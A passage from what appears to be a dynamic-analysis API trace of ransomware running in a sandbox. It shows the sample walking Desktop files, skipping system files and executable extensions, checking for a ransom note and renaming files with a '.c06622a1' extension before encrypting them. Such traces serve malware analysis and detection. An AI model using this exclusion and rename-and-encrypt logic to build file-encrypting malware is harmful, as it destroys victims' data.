RtlComputeCrc32 (PartialCrc=0x565d, Buffer=0x2f30094, Length=0x80) returned 0x5eb72318 [0147.788] RtlComputeCrc32 (PartialCrc=0x2318, Buffer=0x2f30094, Length=0x80) returned 0x9c00e356 [0147.788] RtlComputeCrc32 (PartialCrc=0xe356, Buffer=0x2f30094, Length=0x80) returned 0xeaf847d8 [0147.788] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2f30020) returned 1 [0147.788] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0147.788] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0147.788] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x375895e0, ftCreationTime.dwHighDateTime=0x1d5e1aa, ftLastAccessTime.dwLowDateTime=0x58f9d870, ftLastAccessTime.dwHighDateTime=0x1d5dd87, ftLastWriteTime.dwLowDateTime=0x58f9d870, ftLastWriteTime.dwHighDateTime=0x1d5dd87, nFileSizeHigh=0x0, nFileSizeLow=0x15870, dwReserved0=0x0, dwReserved1=0x0, cFileName="gYTKdnU9U9.swf", cAlternateFileName="GYTKDN~1.SWF")) returned 1 [0147.788] _wcsicmp (_Str1="gYTKdnU9U9.swf", _Str2="README.c06622a1.TXT") returned -11 [0147.788] wcsstr (_Str="gYTKdnU9U9.swf", _SubStr="README") returned 0x0 [0147.788] _wcsicmp (_Str1="autorun.inf", _Str2="gYTKdnU9U9.swf") returned -6 [0147.788] wcslen (_String="autorun.inf") returned 0xb [0147.788] _wcsicmp (_Str1="boot.ini", _Str2="gYTKdnU9U9.swf") returned -5 [0147.788] wcslen (_String="boot.ini") returned 0x8 [0147.788] _wcsicmp (_Str1="bootfont.bin", _Str2="gYTKdnU9U9.swf") returned -5 [0147.788] wcslen (_String="bootfont.bin") returned 0xc [0147.788] _wcsicmp (_Str1="bootsect.bak", _Str2="gYTKdnU9U9.swf") returned -5 [0147.788] wcslen (_String="bootsect.bak") returned 0xc [0147.788] _wcsicmp (_Str1="desktop.ini", _Str2="gYTKdnU9U9.swf") returned -3 [0147.788] wcslen (_String="desktop.ini") returned 0xb [0147.788] _wcsicmp (_Str1="iconcache.db", _Str2="gYTKdnU9U9.swf") returned 2 [0147.788] wcslen (_String="iconcache.db") returned 0xc [0147.788] _wcsicmp (_Str1="ntldr", _Str2="gYTKdnU9U9.swf") returned 7 [0147.788] wcslen (_String="ntldr") returned 0x5 [0147.788] _wcsicmp (_Str1="ntuser.dat", _Str2="gYTKdnU9U9.swf") returned 7 [0147.788] wcslen (_String="ntuser.dat") returned 0xa [0147.788] _wcsicmp (_Str1="ntuser.dat.log", _Str2="gYTKdnU9U9.swf") returned 7 [0147.788] wcslen (_String="ntuser.dat.log") returned 0xe [0147.788] _wcsicmp (_Str1="ntuser.ini", _Str2="gYTKdnU9U9.swf") returned 7 [0147.788] wcslen (_String="ntuser.ini") returned 0xa [0147.788] _wcsicmp (_Str1="thumbs.db", _Str2="gYTKdnU9U9.swf") returned 13 [0147.788] wcslen (_String="thumbs.db") returned 0x9 [0147.789] _wcsicmp (_Str1="386", _Str2="swf") returned -64 [0147.789] wcslen (_String="386") returned 0x3 [0147.789] _wcsicmp (_Str1="adv", _Str2="swf") returned -18 [0147.789] wcslen (_String="adv") returned 0x3 [0147.789] _wcsicmp (_Str1="ani", _Str2="swf") returned -18 [0147.789] wcslen (_String="ani") returned 0x3 [0147.789] _wcsicmp (_Str1="bat", _Str2="swf") returned -17 [0147.789] wcslen (_String="bat") returned 0x3 [0147.789] _wcsicmp (_Str1="bin", _Str2="swf") returned -17 [0147.789] wcslen (_String="bin") returned 0x3 [0147.789] _wcsicmp (_Str1="cab", _Str2="swf") returned -16 [0147.789] wcslen (_String="cab") returned 0x3 [0147.789] _wcsicmp (_Str1="cmd", _Str2="swf") returned -16 [0147.789] wcslen (_String="cmd") returned 0x3 [0147.789] _wcsicmp (_Str1="com", _Str2="swf") returned -16 [0147.789] wcslen (_String="com") returned 0x3 [0147.789] _wcsicmp (_Str1="cpl", _Str2="swf") returned -16 [0147.789] wcslen (_String="cpl") returned 0x3 [0147.789] _wcsicmp (_Str1="cur", _Str2="swf") returned -16 [0147.789] wcslen (_String="cur") returned 0x3 [0147.789] _wcsicmp (_Str1="deskthemepack", _Str2="swf") returned -15 [0147.789] wcslen (_String="deskthemepack") returned 0xd [0147.789] _wcsicmp (_Str1="diagcab", _Str2="swf") returned -15 [0147.789] wcslen (_String="diagcab") returned 0x7 [0147.789] _wcsicmp (_Str1="diagcfg", _Str2="swf") returned -15 [0147.789] wcslen (_String="diagcfg") returned 0x7 [0147.789] _wcsicmp (_Str1="diagpkg", _Str2="swf") returned -15 [0147.789] wcslen (_String="diagpkg") returned 0x7 [0147.789] _wcsicmp (_Str1="dll", _Str2="swf") returned -15 [0147.789] wcslen (_String="dll") returned 0x3 [0147.789] _wcsicmp (_Str1="drv", _Str2="swf") returned -15 [0147.789] wcslen (_String="drv") returned 0x3 [0147.789] _wcsicmp (_Str1="exe", _Str2="swf") returned -14 [0147.789] wcslen (_String="exe") returned 0x3 [0147.789] _wcsicmp (_Str1="hlp", _Str2="swf") returned -11 [0147.789] wcslen (_String="hlp") returned 0x3 [0147.789] _wcsicmp (_Str1="icl", _Str2="swf") returned -10 [0147.790] wcslen (_String="icl") returned 0x3 [0147.790] _wcsicmp (_Str1="icns", _Str2="swf") returned -10 [0147.790] wcslen (_String="icns") returned 0x4 [0147.790] _wcsicmp (_Str1="ico", _Str2="swf") returned -10 [0147.790] wcslen (_String="ico") returned 0x3 [0147.790] _wcsicmp (_Str1="ics", _Str2="swf") returned -10 [0147.790] wcslen (_String="ics") returned 0x3 [0147.790] _wcsicmp (_Str1="idx", _Str2="swf") returned -10 [0147.790] wcslen (_String="idx") returned 0x3 [0147.790] _wcsicmp (_Str1="ldf", _Str2="swf") returned -7 [0147.790] wcslen (_String="ldf") returned 0x3 [0147.790] _wcsicmp (_Str1="lnk", _Str2="swf") returned -7 [0147.790] wcslen (_String="lnk") returned 0x3 [0147.790] _wcsicmp (_Str1="mod", _Str2="swf") returned -6 [0147.790] wcslen (_String="mod") returned 0x3 [0147.790] _wcsicmp (_Str1="mpa", _Str2="swf") returned -6 [0147.790] wcslen (_String="mpa") returned 0x3 [0147.790] _wcsicmp (_Str1="msc", _Str2="swf") returned -6 [0147.790] wcslen (_String="msc") returned 0x3 [0147.790] _wcsicmp (_Str1="msp", _Str2="swf") returned -6 [0147.790] wcslen (_String="msp") returned 0x3 [0147.790] _wcsicmp (_Str1="msstyles", _Str2="swf") returned -6 [0147.790] wcslen (_String="msstyles") returned 0x8 [0147.790] _wcsicmp (_Str1="msu", _Str2="swf") returned -6 [0147.790] wcslen (_String="msu") returned 0x3 [0147.790] _wcsicmp (_Str1="nls", _Str2="swf") returned -5 [0147.790] wcslen (_String="nls") returned 0x3 [0147.790] _wcsicmp (_Str1="nomedia", _Str2="swf") returned -5 [0147.790] wcslen (_String="nomedia") returned 0x7 [0147.790] _wcsicmp (_Str1="ocx", _Str2="swf") returned -4 [0147.790] wcslen (_String="ocx") returned 0x3 [0147.790] _wcsicmp (_Str1="prf", _Str2="swf") returned -3 [0147.790] wcslen (_String="prf") returned 0x3 [0147.790] _wcsicmp (_Str1="ps1", _Str2="swf") returned -3 [0147.790] wcslen (_String="ps1") returned 0x3 [0147.790] _wcsicmp (_Str1="rom", _Str2="swf") returned -1 [0147.790] wcslen (_String="rom") returned 0x3 [0147.790] _wcsicmp (_Str1="rtp", _Str2="swf") returned -1 [0147.790] wcslen (_String="rtp") returned 0x3 [0147.791] _wcsicmp (_Str1="scr", _Str2="swf") returned -20 [0147.791] wcslen (_String="scr") returned 0x3 [0147.791] _wcsicmp (_Str1="shs", _Str2="swf") returned -15 [0147.791] wcslen (_String="shs") returned 0x3 [0147.791] _wcsicmp (_Str1="spl", _Str2="swf") returned -7 [0147.791] wcslen (_String="spl") returned 0x3 [0147.791] _wcsicmp (_Str1="sys", _Str2="swf") returned 2 [0147.791] wcslen (_String="sys") returned 0x3 [0147.791] _wcsicmp (_Str1="theme", _Str2="swf") returned 1 [0147.791] wcslen (_String="theme") returned 0x5 [0147.791] _wcsicmp (_Str1="themepack", _Str2="swf") returned 1 [0147.791] wcslen (_String="themepack") returned 0x9 [0147.791] _wcsicmp (_Str1="wpx", _Str2="swf") returned 4 [0147.791] wcslen (_String="wpx") returned 0x3 [0147.791] _wcsicmp (_Str1="lock", _Str2="swf") returned -7 [0147.791] wcslen (_String="lock") returned 0x4 [0147.791] _wcsicmp (_Str1="key", _Str2="swf") returned -8 [0147.791] wcslen (_String="key") returned 0x3 [0147.791] _wcsicmp (_Str1="hta", _Str2="swf") returned -11 [0147.791] wcslen (_String="hta") returned 0x3 [0147.791] _wcsicmp (_Str1="msi", _Str2="swf") returned -6 [0147.791] wcslen (_String="msi") returned 0x3 [0147.791] _wcsicmp (_Str1="pdb", _Str2="swf") returned -3 [0147.791] wcslen (_String="pdb") returned 0x3 [0147.791] _wcsicmp (_Str1="sql", _Str2="swf") returned -6 [0147.791] wcslen (_String="sql") returned 0x3 [0147.791] _wcsicmp (_Str1="sqlite", _Str2="swf") returned -6 [0147.791] wcslen (_String="sqlite") returned 0x6 [0147.791] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0147.791] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0147.791] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0147.791] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x29 [0147.791] wcscpy (in: _Dest=0x44d00cc, _Source="gYTKdnU9U9.swf" | out: _Dest="gYTKdnU9U9.swf") returned="gYTKdnU9U9.swf" [0147.792] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gYTKdnU9U9.swf", dwFileAttributes=0x80) returned 1 [0147.792] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gYTKdnU9U9.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gytkdnu9u9.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x620 [0147.792] SetFilePointerEx (in: hFile=0x620, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.792] ReadFile (in: hFile=0x620, lpBuffer=0x3feb74, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fec04, lpOverlapped=0x0 | out: lpBuffer=0x3feb74*, lpNumberOfBytesRead=0x3fec04*=0x90, lpOverlapped=0x0) returned 1 [0147.793] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3feb74, Length=0x80) returned 0xc22b020d [0147.793] RtlComputeCrc32 (PartialCrc=0x20d, Buffer=0x3feb74, Length=0x80) returned 0x7ed9b619 [0147.793] RtlComputeCrc32 (PartialCrc=0xb619, Buffer=0x3feb74, Length=0x80) returned 0x83333ef9 [0147.793] RtlComputeCrc32 (PartialCrc=0x3ef9, Buffer=0x3feb74, Length=0x80) returned 0x746d0e87 [0147.793] RtlComputeCrc32 (PartialCrc=0xe87, Buffer=0x3feb74, Length=0x80) returned 0xbe896a04 [0147.793] CloseHandle (hObject=0x620) returned 1 [0147.793] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0147.793] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gYTKdnU9U9.swf" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gYTKdnU9U9.swf") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gYTKdnU9U9.swf" [0147.793] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gYTKdnU9U9.swf") returned 0x38 [0147.793] wcscpy (in: _Dest=0x44e00f0, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0147.793] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gYTKdnU9U9.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gytkdnu9u9.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gYTKdnU9U9.swf.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gytkdnu9u9.swf.c06622a1"), dwFlags=0x8) returned 1 [0147.796] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gYTKdnU9U9.swf.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gytkdnu9u9.swf.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x620 [0147.796] CreateIoCompletionPort (FileHandle=0x620, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0147.796] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x41f0020 [0147.801] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1d3af76 [0147.801] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x27c8b888 [0147.801] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3bc46c1f [0147.801] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x526ba7b5 [0147.801] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6d408b30 [0147.801] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x657c0b [0147.801] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x78ab0690 [0147.801] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x718a6acd [0147.804] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x41f0094, Length=0x80) returned 0xf87cedf4 [0147.804] RtlComputeCrc32 (PartialCrc=0xedf4, Buffer=0x41f0094, Length=0x80) returned 0x2fb36195 [0147.804] RtlComputeCrc32 (PartialCrc=0x6195, Buffer=0x41f0094, Length=0x80) returned 0x10ce3f7 [0147.804] RtlComputeCrc32 (PartialCrc=0xe3f7, Buffer=0x41f0094, Length=0x80) returned 0xad7506c3 [0147.804] RtlComputeCrc32 (PartialCrc=0x6c3, Buffer=0x41f0094, Length=0x80) returned 0xf1614b07 [0147.804] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x41f0020) returned 1 [0147.804] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0147.804] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0147.804] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e4e2180, ftCreationTime.dwHighDateTime=0x1d5e3f8, ftLastAccessTime.dwLowDateTime=0x2c0a93f0, ftLastAccessTime.dwHighDateTime=0x1d5e3ee, ftLastWriteTime.dwLowDateTime=0x2c0a93f0, ftLastWriteTime.dwHighDateTime=0x1d5e3ee, nFileSizeHigh=0x0, nFileSizeLow=0x17a19, dwReserved0=0x0, dwReserved1=0x0, cFileName="gzo ImiS2UujKZMC.m4a", cAlternateFileName="GZOIMI~1.M4A")) returned 1 [0147.804] _wcsicmp (_Str1="gzo ImiS2UujKZMC.m4a", _Str2="README.c06622a1.TXT") returned -11 [0147.804] wcsstr (_Str="gzo ImiS2UujKZMC.m4a", _SubStr="README") returned 0x0 [0147.804] _wcsicmp (_Str1="autorun.inf", _Str2="gzo ImiS2UujKZMC.m4a") returned -6 [0147.805] wcslen (_String="autorun.inf") returned 0xb [0147.805] _wcsicmp (_Str1="boot.ini", _Str2="gzo ImiS2UujKZMC.m4a") returned -5 [0147.805] wcslen (_String="boot.ini") returned 0x8 [0147.805] _wcsicmp (_Str1="bootfont.bin", _Str2="gzo ImiS2UujKZMC.m4a") returned -5 [0147.805] wcslen (_String="bootfont.bin") returned 0xc [0147.805] _wcsicmp (_Str1="bootsect.bak", _Str2="gzo ImiS2UujKZMC.m4a") returned -5 [0147.805] wcslen (_String="bootsect.bak") returned 0xc [0147.805] _wcsicmp (_Str1="desktop.ini", _Str2="gzo ImiS2UujKZMC.m4a") returned -3 [0147.805] wcslen (_String="desktop.ini") returned 0xb [0147.805] _wcsicmp (_Str1="iconcache.db", _Str2="gzo ImiS2UujKZMC.m4a") returned 2 [0147.805] wcslen (_String="iconcache.db") returned 0xc [0147.805] _wcsicmp (_Str1="ntldr", _Str2="gzo ImiS2UujKZMC.m4a") returned 7 [0147.805] wcslen (_String="ntldr") returned 0x5 [0147.805] _wcsicmp (_Str1="ntuser.dat", _Str2="gzo ImiS2UujKZMC.m4a") returned 7 [0147.805] wcslen (_String="ntuser.dat") returned 0xa [0147.805] _wcsicmp (_Str1="ntuser.dat.log", _Str2="gzo ImiS2UujKZMC.m4a") returned 7 [0147.805] wcslen (_String="ntuser.dat.log") returned 0xe [0147.805] _wcsicmp (_Str1="ntuser.ini", _Str2="gzo ImiS2UujKZMC.m4a") returned 7 [0147.805] wcslen (_String="ntuser.ini") returned 0xa [0147.805] _wcsicmp (_Str1="thumbs.db", _Str2="gzo ImiS2UujKZMC.m4a") returned 13 [0147.805] wcslen (_String="thumbs.db") returned 0x9 [0147.805] _wcsicmp (_Str1="386", _Str2="m4a") returned -58 [0147.805] wcslen (_String="386") returned 0x3 [0147.805] _wcsicmp (_Str1="adv", _Str2="m4a") returned -12 [0147.805] wcslen (_String="adv") returned 0x3 [0147.805] _wcsicmp (_Str1="ani", _Str2="m4a") returned -12 [0147.805] wcslen (_String="ani") returned 0x3 [0147.805] _wcsicmp (_Str1="bat", _Str2="m4a") returned -11 [0147.805] wcslen (_String="bat") returned 0x3 [0147.805] _wcsicmp (_Str1="bin", _Str2="m4a") returned -11 [0147.805] wcslen (_String="bin") returned 0x3 [0147.805] _wcsicmp (_Str1="cab", _Str2="m4a") returned -10 [0147.805] wcslen (_String="cab") returned 0x3 [0147.805] _wcsicmp (_Str1="cmd", _Str2="m4a") returned -10 [0147.805] wcslen (_String="cmd") returned 0x3 [0147.805] _wcsicmp (_Str1="com", _Str2="m4a") returned -10 [0147.806] wcslen (_String="com") returned 0x3 [0147.806] _wcsicmp (_Str1="cpl", _Str2="m4a") returned -10 [0147.806] wcslen (_String="cpl") returned 0x3 [0147.806] _wcsicmp (_Str1="cur", _Str2="m4a") returned -10 [0147.806] wcslen (_String="cur") returned 0x3 [0147.806] _wcsicmp (_Str1="deskthemepack", _Str2="m4a") returned -9 [0147.806] wcslen (_String="deskthemepack") returned 0xd [0147.806] _wcsicmp (_Str1="diagcab", _Str2="m4a") returned -9 [0147.806] wcslen (_String="diagcab") returned 0x7 [0147.806] _wcsicmp (_Str1="diagcfg", _Str2="m4a") returned -9 [0147.806] wcslen (_String="diagcfg") returned 0x7 [0147.806] _wcsicmp (_Str1="diagpkg", _Str2="m4a") returned -9 [0147.806] wcslen (_String="diagpkg") returned 0x7 [0147.806] _wcsicmp (_Str1="dll", _Str2="m4a") returned -9 [0147.806] wcslen (_String="dll") returned 0x3 [0147.806] _wcsicmp (_Str1="drv", _Str2="m4a") returned -9 [0147.806] wcslen (_String="drv") returned 0x3 [0147.806] _wcsicmp (_Str1="exe", _Str2="m4a") returned -8 [0147.806] wcslen (_String="exe") returned 0x3 [0147.806] _wcsicmp (_Str1="hlp", _Str2="m4a") returned -5 [0147.806] wcslen (_String="hlp") returned 0x3 [0147.806] _wcsicmp (_Str1="icl", _Str2="m4a") returned -4 [0147.806] wcslen (_String="icl") returned 0x3 [0147.806] _wcsicmp (_Str1="icns", _Str2="m4a") returned -4 [0147.806] wcslen (_String="icns") returned 0x4 [0147.806] _wcsicmp (_Str1="ico", _Str2="m4a") returned -4 [0147.806] wcslen (_String="ico") returned 0x3 [0147.806] _wcsicmp (_Str1="ics", _Str2="m4a") returned -4 [0147.806] wcslen (_String="ics") returned 0x3 [0147.806] _wcsicmp (_Str1="idx", _Str2="m4a") returned -4 [0147.806] wcslen (_String="idx") returned 0x3 [0147.806] _wcsicmp (_Str1="ldf", _Str2="m4a") returned -1 [0147.806] wcslen (_String="ldf") returned 0x3 [0147.806] _wcsicmp (_Str1="lnk", _Str2="m4a") returned -1 [0147.806] wcslen (_String="lnk") returned 0x3 [0147.806] _wcsicmp (_Str1="mod", _Str2="m4a") returned 59 [0147.806] wcslen (_String="mod") returned 0x3 [0147.806] _wcsicmp (_Str1="mpa", _Str2="m4a") returned 60 [0147.807] wcslen (_String="mpa") returned 0x3 [0147.807] _wcsicmp (_Str1="msc", _Str2="m4a") returned 63 [0147.807] wcslen (_String="msc") returned 0x3 [0147.807] _wcsicmp (_Str1="msp", _Str2="m4a") returned 63 [0147.807] wcslen (_String="msp") returned 0x3 [0147.807] _wcsicmp (_Str1="msstyles", _Str2="m4a") returned 63 [0147.807] wcslen (_String="msstyles") returned 0x8 [0147.807] _wcsicmp (_Str1="msu", _Str2="m4a") returned 63 [0147.807] wcslen (_String="msu") returned 0x3 [0147.807] _wcsicmp (_Str1="nls", _Str2="m4a") returned 1 [0147.807] wcslen (_String="nls") returned 0x3 [0147.807] _wcsicmp (_Str1="nomedia", _Str2="m4a") returned 1 [0147.807] wcslen (_String="nomedia") returned 0x7 [0147.807] _wcsicmp (_Str1="ocx", _Str2="m4a") returned 2 [0147.807] wcslen (_String="ocx") returned 0x3 [0147.807] _wcsicmp (_Str1="prf", _Str2="m4a") returned 3 [0147.807] wcslen (_String="prf") returned 0x3 [0147.807] _wcsicmp (_Str1="ps1", _Str2="m4a") returned 3 [0147.807] wcslen (_String="ps1") returned 0x3 [0147.807] _wcsicmp (_Str1="rom", _Str2="m4a") returned 5 [0147.807] wcslen (_String="rom") returned 0x3 [0147.807] _wcsicmp (_Str1="rtp", _Str2="m4a") returned 5 [0147.807] wcslen (_String="rtp") returned 0x3 [0147.807] _wcsicmp (_Str1="scr", _Str2="m4a") returned 6 [0147.807] wcslen (_String="scr") returned 0x3 [0147.807] _wcsicmp (_Str1="shs", _Str2="m4a") returned 6 [0147.807] wcslen (_String="shs") returned 0x3 [0147.807] _wcsicmp (_Str1="spl", _Str2="m4a") returned 6 [0147.807] wcslen (_String="spl") returned 0x3 [0147.807] _wcsicmp (_Str1="sys", _Str2="m4a") returned 6 [0147.807] wcslen (_String="sys") returned 0x3 [0147.807] _wcsicmp (_Str1="theme", _Str2="m4a") returned 7 [0147.807] wcslen (_String="theme") returned 0x5 [0147.807] _wcsicmp (_Str1="themepack", _Str2="m4a") returned 7 [0147.807] wcslen (_String="themepack") returned 0x9 [0147.807] _wcsicmp (_Str1="wpx", _Str2="m4a") returned 10 [0147.807] wcslen (_String="wpx") returned 0x3 [0147.807] _wcsicmp (_Str1="lock", _Str2="m4a") returned -1 [0147.808] wcslen (_String="lock") returned 0x4 [0147.808] _wcsicmp (_Str1="key", _Str2="m4a") returned -2 [0147.808] wcslen (_String="key") returned 0x3 [0147.808] _wcsicmp (_Str1="hta", _Str2="m4a") returned -5 [0147.808] wcslen (_String="hta") returned 0x3 [0147.808] _wcsicmp (_Str1="msi", _Str2="m4a") returned 63 [0147.808] wcslen (_String="msi") returned 0x3 [0147.808] _wcsicmp (_Str1="pdb", _Str2="m4a") returned 3 [0147.808] wcslen (_String="pdb") returned 0x3 [0147.808] _wcsicmp (_Str1="sql", _Str2="m4a") returned 6 [0147.808] wcslen (_String="sql") returned 0x3 [0147.808] _wcsicmp (_Str1="sqlite", _Str2="m4a") returned 6 [0147.808] wcslen (_String="sqlite") returned 0x6 [0147.808] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0147.808] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0147.808] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0147.808] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x29 [0147.808] wcscpy (in: _Dest=0x44d00cc, _Source="gzo ImiS2UujKZMC.m4a" | out: _Dest="gzo ImiS2UujKZMC.m4a") returned="gzo ImiS2UujKZMC.m4a" [0147.808] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gzo ImiS2UujKZMC.m4a", dwFileAttributes=0x80) returned 1 [0147.808] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gzo ImiS2UujKZMC.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gzo imis2uujkzmc.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x628 [0147.808] SetFilePointerEx (in: hFile=0x628, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.809] ReadFile (in: hFile=0x628, lpBuffer=0x3feb74, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fec04, lpOverlapped=0x0 | out: lpBuffer=0x3feb74*, lpNumberOfBytesRead=0x3fec04*=0x90, lpOverlapped=0x0) returned 1 [0147.810] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3feb74, Length=0x80) returned 0x3575ad1e [0147.810] RtlComputeCrc32 (PartialCrc=0xad1e, Buffer=0x3feb74, Length=0x80) returned 0x61a86439 [0147.810] RtlComputeCrc32 (PartialCrc=0x6439, Buffer=0x3feb74, Length=0x80) returned 0xa39816fe [0147.810] RtlComputeCrc32 (PartialCrc=0x16fe, Buffer=0x3feb74, Length=0x80) returned 0x9fdc9308 [0147.810] RtlComputeCrc32 (PartialCrc=0x9308, Buffer=0x3feb74, Length=0x80) returned 0x1bc955e1 [0147.810] CloseHandle (hObject=0x628) returned 1 [0147.810] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0147.810] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gzo ImiS2UujKZMC.m4a" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gzo ImiS2UujKZMC.m4a") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gzo ImiS2UujKZMC.m4a" [0147.810] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gzo ImiS2UujKZMC.m4a") returned 0x3e [0147.810] wcscpy (in: _Dest=0x44e00fc, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0147.810] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gzo ImiS2UujKZMC.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gzo imis2uujkzmc.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gzo ImiS2UujKZMC.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gzo imis2uujkzmc.m4a.c06622a1"), dwFlags=0x8) returned 1 [0147.812] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gzo ImiS2UujKZMC.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gzo imis2uujkzmc.m4a.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x628 [0147.812] CreateIoCompletionPort (FileHandle=0x628, 